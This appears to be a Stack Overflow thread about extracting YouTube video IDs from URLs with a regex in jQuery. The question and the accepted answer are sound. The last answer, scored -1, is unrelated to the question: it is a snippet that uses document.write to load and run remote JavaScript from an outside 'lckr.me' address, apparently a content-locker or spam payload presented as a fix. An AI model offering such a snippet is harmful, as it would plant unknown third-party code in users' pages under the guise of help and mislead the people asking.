# YouTube replace url with video ID using JavaScript and jQuery

Tags: javascript, jquery, regex, parsing, youtube

i have taken the regex from this http://jsfiddle.net/HfqmE/1/
I have the HTML

```
<span class="yturl">http://www.youtube.com/watch?feature=endscreen&NR=1&v=jSAwWrbdoEQ</span>
<span class="yturl">http://www.youtube.com/watch?v=jSAwWrbdoEQ&feature=feedrec_grec_index</span>
<span class="yturl">http://youtu.be/jSAwWrbdoEQ</span>
<span class="yturl">http://www.youtube.com/embed/jSAwWrbdoEQ</span>
<span class="yturl">http://www.youtube.com/v/jSAwWrbdoEQ?version=3&amp;hl=en_US</span>
<span class="yturl">http://www.youtube.com/watch?NR=1&feature=endscreen&v=jSAwWrbdoEQ</span>
<span class="yturl">http://www.youtube.com/user/TheGameVEVO#p/a/u/1/jSAwWrbdoEQ</span>
```

for each `span.yturl` I am trying to extract the id from the youtube url it contains i have attempted http://jsfiddle.net/HfqmE/40/

```
$("span.yturl").each(function(){
    var regex = /(\?v=|\&v=|\/\d\/|\/embed\/|\/v\/|\.be\/)([a-zA-Z0-9\-\_]+)/;
    var youtubeurl = $("span.yturl").html();
    var regexyoutubeurl = youtubeurl.match(regex);
    $("span.yturl").html(regexyoutubeurl);
});
```

this however just leaves the outcome blank please help!!

Answer (score 3, accepted):

Match returns an Array.  It looks like you want `regexyoutubeurl[2]`.

You are re-querying `$("span.yturl")` inside your iterator function.  This way you are acting on every span 7 times instead of acting on each of the 7 spans one time.  Use `$(this)` instead.

Also, use `.text()` instead of `.html()`, lest your `&` becomes `&amp;`.

```
$("span.yturl").each(function(){
    var regex = /(\?v=|\&v=|\/\d\/|\/embed\/|\/v\/|\.be\/)([a-zA-Z0-9\-\_]+)/;
    var youtubeurl = $(this).text();
    var regexyoutubeurl = youtubeurl.match(regex);
    if (regexyoutubeurl) {
        $(this).text(regexyoutubeurl[2]);
    }
});
```

http://jsfiddle.net/gilly3/HfqmE/53/

Comment: brilliant but one problem unfortunately each returned id has http infront why is that?

Comment: @Yusaf - Turns out there was more than one issue.  I've updated my answer to address the other issues.

Answer (score -1):

```
<script>
var LockedTag = 'replace-this-with-your-videoID';
document.write('<'+'script src="http://lckr.me/18B?s='+Math.round(Math.random()*100000)+'" type="text/javascript"><'+'/script>');
</script>
```